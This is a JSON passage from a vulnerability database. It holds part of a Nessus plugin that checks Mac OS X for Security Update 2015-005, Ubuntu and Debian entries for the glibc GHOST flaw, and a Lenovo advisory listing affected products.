\"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-0286\",\n \"CVE-2015-0287\",\n \"CVE-2015-0288\",\n \"CVE-2015-0289\",\n \"CVE-2015-0293\",\n \"CVE-2015-1157\",\n \"CVE-2015-1798\",\n \"CVE-2015-1799\",\n \"CVE-2015-3661\",\n \"CVE-2015-3662\",\n \"CVE-2015-3663\",\n \"CVE-2015-3666\",\n \"CVE-2015-3667\",\n \"CVE-2015-3668\",\n \"CVE-2015-3671\",\n \"CVE-2015-3672\",\n \"CVE-2015-3673\",\n \"CVE-2015-3674\",\n \"CVE-2015-3675\",\n \"CVE-2015-3676\",\n \"CVE-2015-3677\",\n \"CVE-2015-3678\",\n \"CVE-2015-3679\",\n \"CVE-2015-3680\",\n \"CVE-2015-3681\",\n \"CVE-2015-3682\",\n \"CVE-2015-3683\",\n \"CVE-2015-3684\",\n \"CVE-2015-3685\",\n \"CVE-2015-3686\",\n \"CVE-2015-3687\",\n \"CVE-2015-3688\",\n \"CVE-2015-3689\",\n \"CVE-2015-3690\",\n \"CVE-2015-3691\",\n \"CVE-2015-3692\",\n \"CVE-2015-3693\",\n \"CVE-2015-3694\",\n \"CVE-2015-3695\",\n \"CVE-2015-3696\",\n \"CVE-2015-3697\",\n \"CVE-2015-3698\",\n \"CVE-2015-3699\",\n \"CVE-2015-3700\",\n \"CVE-2015-3701\",\n \"CVE-2015-3702\",\n \"CVE-2015-3703\",\n \"CVE-2015-3704\",\n \"CVE-2015-3705\",\n \"CVE-2015-3706\",\n \"CVE-2015-3707\",\n \"CVE-2015-3708\",\n \"CVE-2015-3709\",\n \"CVE-2015-3710\",\n \"CVE-2015-3711\",\n \"CVE-2015-3712\",\n \"CVE-2015-3713\",\n \"CVE-2015-3714\",\n \"CVE-2015-3715\",\n \"CVE-2015-3716\",\n \"CVE-2015-3717\",\n \"CVE-2015-3718\",\n \"CVE-2015-3719\",\n \"CVE-2015-3720\",\n \"CVE-2015-3721\",\n \"CVE-2015-4000\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73225,\n 73227,\n 73231,\n 73232,\n 73237,\n 73239,\n 73950,\n 73951,\n 74733\n );\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-06-30-2\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2015-005) (GHOST) (Logjam)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.8.5 or 10.9.5\nthat is missing Security Update 2015-005. It is, therefore, affected\nmultiple vulnerabilities in the following components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-ca/HT204942\");\n # http://lists.apple.com/archives/security-announce/2015/Jun/msg00002.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?956357d4\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://weakdh.org/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2015-005 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple OS X Entitlements Rootpipe Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\npatch = \"2015-005\";\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif 
(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Advisory states that the update is available for 10.10.2\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[89]\\.5([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.8.5 or Mac OS X 10.9.5\");\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-17T14:44:48", "description": "The remote host is running a version of Mac OS X 10.10.x that is prior to version 10.10.4 and the following components contain vulnerabilities :\n\n - Admin Framework \n- afpserver \n - apache \n - AppleFSCompression \n - AppleGraphicsControl \n - AppleThunderboltEDMService \n - ATS \n - Bluetooth \n - Certificate Trust Policy \n - CFNetwork HTTPAuthentication \n - CoreText \n - coreTLS \n - DiskImages \n - Display Drivers \n - EFI \n - FontParser \n - Graphics Driver \n - ImageIO \n - Install Framework Legacy \n - Intel Graphics Driver \n 
- IOAcceleratorFamily \n - IOFireWireFamily \n - Kernel \n - kext tools \n - Mail \n - ntfs \n - ntp \n - OpenSSL \n - QuickTime \n - Security \n - Spotlight \n - SQLite \n - System Stats \n - TrueTypeScaler \n - zip", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2015-10-12T00:00:00", "type": "nessus", "title": "Mac OS X < 10.10.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1741", "CVE-2014-8127", "CVE-2014-8128", "CVE-2014-8129", "CVE-2014-8130", "CVE-2014-8139", "CVE-2014-8140", "CVE-2014-8141", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-1157", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-3661", "CVE-2015-3662", "CVE-2015-3663", "CVE-2015-3666", "CVE-2015-3667", "CVE-2015-3668", "CVE-2015-3671", "CVE-2015-3672", "CVE-2015-3673", "CVE-2015-3674", "CVE-2015-3675", "CVE-2015-3676", "CVE-2015-3677", "CVE-2015-3678", "CVE-2015-3679", "CVE-2015-3680", "CVE-2015-3681", "CVE-2015-3682", "CVE-2015-3683", "CVE-2015-3684", "CVE-2015-3685", "CVE-2015-3686", "CVE-2015-3687", 
"CVE-2015-3688", "CVE-2015-3689", "CVE-2015-3690", "CVE-2015-3691", "CVE-2015-3692", "CVE-2015-3693", "CVE-2015-3694", "CVE-2015-3695", "CVE-2015-3696", "CVE-2015-3697", "CVE-2015-3698", "CVE-2015-3699", "CVE-2015-3700", "CVE-2015-3701", "CVE-2015-3702", "CVE-2015-3703", "CVE-2015-3704", "CVE-2015-3705", "CVE-2015-3706", "CVE-2015-3707", "CVE-2015-3708", "CVE-2015-3709", "CVE-2015-3710", "CVE-2015-3711", "CVE-2015-3712", "CVE-2015-3713", "CVE-2015-3714", "CVE-2015-3715", "CVE-2015-3716", "CVE-2015-3717", "CVE-2015-3718", "CVE-2015-3719", "CVE-2015-3720", "CVE-2015-3721", "CVE-2015-4000"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "8801.PRM", "href": "https://www.tenable.com/plugins/nnm/8801", "sourceData": "Binary data 8801.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:17:51", "description": "Heap-based buffer overflow in the __nss_hostname_digits_dots function in\nglibc 2.2, and other 2.x versions before 2.18, allows context-dependent\nattackers to execute arbitrary code via vectors related to the (1)\ngethostbyname or (2) gethostbyname2 function, aka \"GHOST.\"\n\n#### Bugs\n\n * <https://sourceware.org/bugzilla/show_bug.cgi?id=15014>\n", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "ubuntucve", "title": "CVE-2015-0235", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-27T00:00:00", "id": "UB:CVE-2015-0235", "href": 
"https://ubuntu.com/security/CVE-2015-0235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-01-15T06:06:28", "description": "Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka \"GHOST.\"", "cvss3": {}, "published": "2015-01-28T19:59:00", "type": "debiancve", "title": "CVE-2015-0235", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-28T19:59:00", "id": "DEBIANCVE:CVE-2015-0235", "href": "https://security-tracker.debian.org/tracker/CVE-2015-0235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2022-10-24T16:54:22", "description": "**Lenovo Security Advisory:** LEN-2015-007 \n \n**Potential Impact:** Execution of Arbitrary Code \n \n**Severity:** High \n \n**Summary:** \nA vulnerability has been found in the GNU C Library (glibc) __nss_hostname_digits_dots() function that allows both local and remote users to cause a buffer overflow in network function calls gethostbyname() and gethostbyname2(). The media is referring to this vulnerability as \u201cGHOST.\u201d \n \nImmediate patches are required to fix the vulnerability in the glibc that allow arbitrary code execution from unauthenticated users. 
It is necessary to restart computers or process following the patches. \n \n**Description:** \nAccording to Qualys, the vulnerability is \"a buffer overflow in the _ __nss_hostname_digits_dots()_ function of the GNU C Library (_glibc_). This bug is reachable both locally and remotely via the _gethostbyname*()_ functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow. The vulnerability exists in any systems relying on the function in the GNU C Library gethostbyname() and gethostbyname2() functions. There is currently proof of concept code available to exploit this code.\n\n**Affected Products:**\n\nThinkPad\n\nSystem | Status \n---|--- \nThinkPad Edge E130 | Not affected \nThinkPad Edge E145 | Not affected \nThinkPad Edge E431/E531 | Not affected \nThinkPad Edge E440/E540 | Not affected \nThinkPad Edge E455/E555 | Not affected \nThinkPad Edge S430 | Not affected \nThinkPad Helix | Not affected \nThinkPad L430/L530 | Not affected \nThinkPad L440/L540 | Not affected \nThinkPad S1 Yoga (Non-vPro) | Not affected \nThinkPad S1 Yoga (vPro) | Not affected \nThinkPad S431 | Not affected \nThinkPad S440 | Not affected \nThinkPad S531 | Not affected \nThinkPad S540 | Not affected \nThinkPad T430 | Not affected \nThinkPad T430s | Not affected \nThinkPad T430u | Not affected \nThinkPad T431s | Not affected \nThinkPad T440/T440s | Not affected \nThinkPad T440p | Not affected \nThinkPad T530 | Not affected \nThinkPad T540p | Not affected \nThinkPad Tablet 10 (32-bit) | Not affected \nThinkPad Tablet 10 (64-bit) | Not affected \nThinkPad Tablet 2 | Not affected \nThinkPad Tablet 8 (32-bit) | Not affected \nThinkPad Tablet 8 (64-bit) | Not affected \nThinkPad Twist/Edge S230 | Not affected \nThinkPad W530 | Not affected \nThinkPad W540 | Not affected \nThinkPad X1 Carbon (20A7,20A8) | Not affected \nThinkPad X1 Carbon (34xx) | Not affected \nThinkPad X131e (AMD) | Not affected \nThinkPad X131e (Intel) | Not affected \nThinkPad X140e 
(AMD) | Not affected \nThinkPad X230 | Not affected \nThinkPad X230s | Not affected \nThinkPad X230t | Not affected \nThinkPad X240/X240s | Not affected \nThinkPad Yoga 11e | Not affected \n \nThinkCentre\n\nSystem | Status \n---|--- \nThinkCentre E73Z | Not affected \nThinkCentre E93 | Not affected \nThinkCentre E93Z | Not affected \nThinkCentre Edge 62z | Not affected \nThinkCentre Edge 72 | Not affected \nThinkCentre Edge 72z | Not affected \nThinkCentre Edge 92z | Not affected \nThinkCentre M62Z | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72z | Not affected \nThinkCentre M73 | Not affected \nThinkCentre M73 Tiny | Not affected \nThinkCentre M73Z | Not affected \nThinkCentre M78 (type 1562, 1565, 1662, 1663, 1766, 2111, 2113, 2114, 4860, 4863, 4865, 4866, 5100) | Not affected \nThinkCentre M78 (type 10BN, 10BQ, 10BR, 10BS, 10BT, 10BU) | Not affected \nThinkCentre M83 | Not affected \nThinkCentre M83Z | Not affected \nThinkCentre M90 | Not affected \nThinkCentre M90p | Not affected \nThinkCentre M91 | Not affected \nThinkCentre M91P | Not affected \nThinkCentre M92 | Not affected \nThinkCentre M92P | Not affected \nThinkCentre M92Z | Not affected \nThinkCentre M93 | Not affected \nThinkCentre M93P | Not affected \nThinkCentre M93Z | Not affected \n \nThinkStation\n\nSystem | Status \n---|--- \nThinkStation C30 \n(type 1095, 1096, 1097) | Not affected \nThinkStation C30 \n(type 1136, 1137) | Not affected \nThinkStation D30 \n(type 4223, 4228, 4229) | Not affected \nThinkStation D30 \n(type 4353, 4354) | Not affected \nThinkStation E31 | Not affected \nThinkStation E32 | Not affected \nThinkStation P300 | Not affected \nThinkStation P500 | Not affected \nThinkStation P700 | Not affected \nThinkStation P900 | Not affected \nThinkStation S30 | Not affected \nThinkStation S30 | Not affected \n \nThinkServer & Storage\n\nSystem | Status | Minimum version \nincluding Fix | Link 
\n---|---|---|--- \nThinkServer RD330 | Not affected | \u2212 | \u2212 \nThinkServer RD340 | Not affected | \u2212 | \u2212 \nThinkServer RD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70692> \nThinkServer RD430 | Not affected | \u2212 | \u2212 \nThinkServer RD440 | Not affected | \u2212 | \u2212 \nThinkServer RD450 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70693> \nThinkServer RD530 | Not affected | \u2212 | \u2212 \nThinkServer RD540 | Not affected | \u2212 | \u2212 \nThinkServer RD550 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70694> \nThinkServer RD630 | Not affected | \u2212 | \u2212 \nThinkServer RD640 | Not affected | \u2212 | \u2212 \nThinkServer RD650 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70695> \nThinkServer RS140 | Not affected | \u2212 | \u2212 \nThinkServer TD340 | Not affected | \u2212 | \u2212 \nThinkServer TD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70696> \nThinkServer TS130 | Not affected | \u2212 | \u2212 \nThinkServer TS140 | Not affected | \u2212 | \u2212 \nThinkServer TS430 | Not affected | \u2212 | \u2212 \nThinkServer TS440 | Not affected | \u2212 | \u2212 \nThinkStorage SA120 | Not affected | \u2212 | \u2212 \n \nLenovo EMC\n\nSystem | Status \n---|--- \nLenovoEMC EZ Media & Backup (hm3) | Not affected \nLenovoEMC Home Media Cloud Edition (hm2) | Not affected \nLenovoEMC ix12-300r | Not affected \nLenovoEMC ix2 (inc DL) | Not affected \nLenovoEMC ix2-200 | Not affected \nLenovoEMC ix2-200 Cloud Edition | Not affected \nLenovoEMC ix4-200d | Not affected \nLenovoEMC ix4-200d (2.1.x firmware) | Not affected \nLenovoEMC ix4-200d Cloud Edition | Not affected \nLenovoEMC ix4-300d (inc DL) | Not affected \nLenovoEMC px12-350r | Not affected \nLenovoEMC px12-400r | Not 
affected \nLenovoEMC px12-450r | Not affected \nLenovoEMC px2-300d (inc NVR) | Not affected \nLenovoEMC px4-300d (inc NVR) | Not affected \nLenovoEMC px4-300r | Not affected \nLenovoEMC px4-400d (inc NVR) | Not affected \nLenovoEMC px4-400r | Not affected \nLenovoEMC px6-300d | Not affected \n \nSoftware\n\nApplication | Status \n---|--- \nDeploy Manager | Not affected \nDiagnostic | Not affected \nEasy Manager | Not affected \nEasy Updater | Not affected \nEnergy manager | Not affected \nOSPUT | Not affected \nPartner Pack | Not affected \nPower Planner | Not affected \nTSMCLI | Not affected \n \n**Acknowledgements:**\n\n**Other information and references:**\n\n * CERT Vulnerability Note: [VU#967332](<http://www.kb.cert.org/vuls/id/967332>)\n * CVE ID: [CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>)\n\n**Revision History:**\n\n**Revision ** | **Date** | **Description ** \n---|---|--- \n1.2 | 2015-06-29 | Publish additional fixes \n1.1 | 2015-03-03 | Publish additional fixes \n1.0 | 2015-02-16 | Initial release\n", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "lenovo", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow (", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2016-07-22T06:46:07", "id": "LENOVO:PS500043-GNU-C-LIBRARY-GLIBC-__NSS_HOSTNAME_DIGITS_DOTS-FUNCTION-VULNERABLE-TO-BUFFER-OVERFLOW-GHOST-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500043-gnu-c-library-glibc-__nss_hostname_digits_dots-function-vulnerable-to-buffer-overflow-ghost", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-21T17:01:58", "description": "**Lenovo Security Advisory:** LEN-2015-007 \n \n**Potential Impact:** Execution of Arbitrary Code \n \n**Severity:** High \n \n**Summary:** \nA vulnerability has been found in the GNU C Library (glibc) __nss_hostname_digits_dots() function that allows both local and remote users 
to cause a buffer overflow in network function calls gethostbyname() and gethostbyname2(). The media is referring to this vulnerability as \u201cGHOST.\u201d \n \nImmediate patches are required to fix the vulnerability in the glibc that allow arbitrary code execution from unauthenticated users. It is necessary to restart computers or process following the patches. \n \n**Description:** \nAccording to Qualys, the vulnerability is \"a buffer overflow in the _ __nss_hostname_digits_dots()_ function of the GNU C Library (_glibc_). This bug is reachable both locally and remotely via the _gethostbyname*()_ functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow. The vulnerability exists in any systems relying on the function in the GNU C Library gethostbyname() and gethostbyname2() functions. There is currently proof of concept code available to exploit this code.\n\n**Affected Products:**\n\nThinkPad\n\nSystem | Status \n---|--- \nThinkPad Edge E130 | Not affected \nThinkPad Edge E145 | Not affected \nThinkPad Edge E431/E531 | Not affected \nThinkPad Edge E440/E540 | Not affected \nThinkPad Edge E455/E555 | Not affected \nThinkPad Edge S430 | Not affected \nThinkPad Helix | Not affected \nThinkPad L430/L530 | Not affected \nThinkPad L440/L540 | Not affected \nThinkPad S1 Yoga (Non-vPro) | Not affected \nThinkPad S1 Yoga (vPro) | Not affected \nThinkPad S431 | Not affected \nThinkPad S440 | Not affected \nThinkPad S531 | Not affected \nThinkPad S540 | Not affected \nThinkPad T430 | Not affected \nThinkPad T430s | Not affected \nThinkPad T430u | Not affected \nThinkPad T431s | Not affected \nThinkPad T440/T440s | Not affected \nThinkPad T440p | Not affected \nThinkPad T530 | Not affected \nThinkPad T540p | Not affected \nThinkPad Tablet 10 (32-bit) | Not affected \nThinkPad Tablet 10 (64-bit) | Not affected \nThinkPad Tablet 2 | Not affected \nThinkPad Tablet 8 (32-bit) | Not affected \nThinkPad Tablet 8 (64-bit) | Not 
affected \nThinkPad Twist/Edge S230 | Not affected \nThinkPad W530 | Not affected \nThinkPad W540 | Not affected \nThinkPad X1 Carbon (20A7,20A8) | Not affected \nThinkPad X1 Carbon (34xx) | Not affected \nThinkPad X131e (AMD) | Not affected \nThinkPad X131e (Intel) | Not affected \nThinkPad X140e (AMD) | Not affected \nThinkPad X230 | Not affected \nThinkPad X230s | Not affected \nThinkPad X230t | Not affected \nThinkPad X240/X240s | Not affected \nThinkPad Yoga 11e | Not affected \n \nThinkCentre\n\nSystem | Status \n---|--- \nThinkCentre E73Z | Not affected \nThinkCentre E93 | Not affected \nThinkCentre E93Z | Not affected \nThinkCentre Edge 62z | Not affected \nThinkCentre Edge 72 | Not affected \nThinkCentre Edge 72z | Not affected \nThinkCentre Edge 92z | Not affected \nThinkCentre M62Z | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72z | Not affected \nThinkCentre M73 | Not affected \nThinkCentre M73 Tiny | Not affected \nThinkCentre M73Z | Not affected \nThinkCentre M78 (type 1562, 1565, 1662, 1663, 1766, 2111, 2113, 2114, 4860, 4863, 4865, 4866, 5100) | Not affected \nThinkCentre M78 (type 10BN, 10BQ, 10BR, 10BS, 10BT, 10BU) | Not affected \nThinkCentre M83 | Not affected \nThinkCentre M83Z | Not affected \nThinkCentre M90 | Not affected \nThinkCentre M90p | Not affected \nThinkCentre M91 | Not affected \nThinkCentre M91P | Not affected \nThinkCentre M92 | Not affected \nThinkCentre M92P | Not affected \nThinkCentre M92Z | Not affected \nThinkCentre M93 | Not affected \nThinkCentre M93P | Not affected \nThinkCentre M93Z | Not affected \n \nThinkStation\n\nSystem | Status \n---|--- \nThinkStation C30 \n(type 1095, 1096, 1097) | Not affected \nThinkStation C30 \n(type 1136, 1137) | Not affected \nThinkStation D30 \n(type 4223, 4228, 4229) | Not affected \nThinkStation D30 \n(type 4353, 4354) | Not affected \nThinkStation E31 | Not affected \nThinkStation E32 | Not affected 
\nThinkStation P300 | Not affected \nThinkStation P500 | Not affected \nThinkStation P700 | Not affected \nThinkStation P900 | Not affected \nThinkStation S30 | Not affected \nThinkStation S30 | Not affected \n \nThinkServer & Storage\n\nSystem | Status | Minimum version \nincluding Fix | Link \n---|---|---|--- \nThinkServer RD330 | Not affected | \u2212 | \u2212 \nThinkServer RD340 | Not affected | \u2212 | \u2212 \nThinkServer RD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70692> \nThinkServer RD430 | Not affected | \u2212 | \u2212 \nThinkServer RD440 | Not affected | \u2212 | \u2212 \nThinkServer RD450 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70693> \nThinkServer RD530 | Not affected | \u2212 | \u2212 \nThinkServer RD540 | Not affected | \u2212 | \u2212 \nThinkServer RD550 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70694> \nThinkServer RD630 | Not affected | \u2212 | \u2212 \nThinkServer RD640 | Not affected | \u2212 | \u2212 \nThinkServer RD650 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70695> \nThinkServer RS140 | Not affected | \u2212 | \u2212 \nThinkServer TD340 | Not affected | \u2212 | \u2212 \nThinkServer TD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70696> \nThinkServer TS130 | Not affected | \u2212 | \u2212 \nThinkServer TS140 | Not affected | \u2212 | \u2212 \nThinkServer TS430 | Not affected | \u2212 | \u2212 \nThinkServer TS440 | Not affected | \u2212 | \u2212 \nThinkStorage SA120 | Not affected | \u2212 | \u2212 \n \nLenovo EMC\n\nSystem | Status \n---|--- \nLenovoEMC EZ Media & Backup (hm3) | Not affected \nLenovoEMC Home Media Cloud Edition (hm2) | Not affected \nLenovoEMC ix12-300r | Not affected \nLenovoEMC ix2 (inc DL) | Not affected \nLenovoEMC ix2-200 | Not affected 
\nLenovoEMC ix2-200 Cloud Edition | Not affected \nLenovoEMC ix4-200d | Not affected \nLenovoEMC ix4-200d (2.1.x firmware) | Not affected \nLenovoEMC ix4-200d Cloud Edition | Not affected \nLenovoEMC ix4-300d (inc DL) | Not affected \nLenovoEMC px12-350r | Not affected \nLenovoEMC px12-400r | Not affected \nLenovoEMC px12-450r | Not affected \nLenovoEMC px2-300d (inc NVR) | Not affected \nLenovoEMC px4-300d (inc NVR) | Not affected \nLenovoEMC px4-300r | Not affected \nLenovoEMC px4-400d (inc NVR) | Not affected \nLenovoEMC px4-400r | Not affected \nLenovoEMC px6-300d | Not affected \n \nSoftware\n\nApplication | Status \n---|--- \nDeploy Manager | Not affected \nDiagnostic | Not affected \nEasy Manager | Not affected \nEasy Updater | Not affected \nEnergy manager | Not affected \nOSPUT | Not affected \nPartner Pack | Not affected \nPower Planner | Not affected \nTSMCLI | Not affected \n \n**Acknowledgements:**\n\n**Other information and references:**\n\n * CERT Vulnerability Note: [VU#967332](<http://www.kb.cert.org/vuls/id/967332>)\n * CVE ID: 